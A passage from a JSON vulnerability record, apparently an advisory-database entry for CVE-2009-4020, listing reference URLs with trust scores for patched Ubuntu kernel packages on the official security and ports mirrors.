        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4020"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
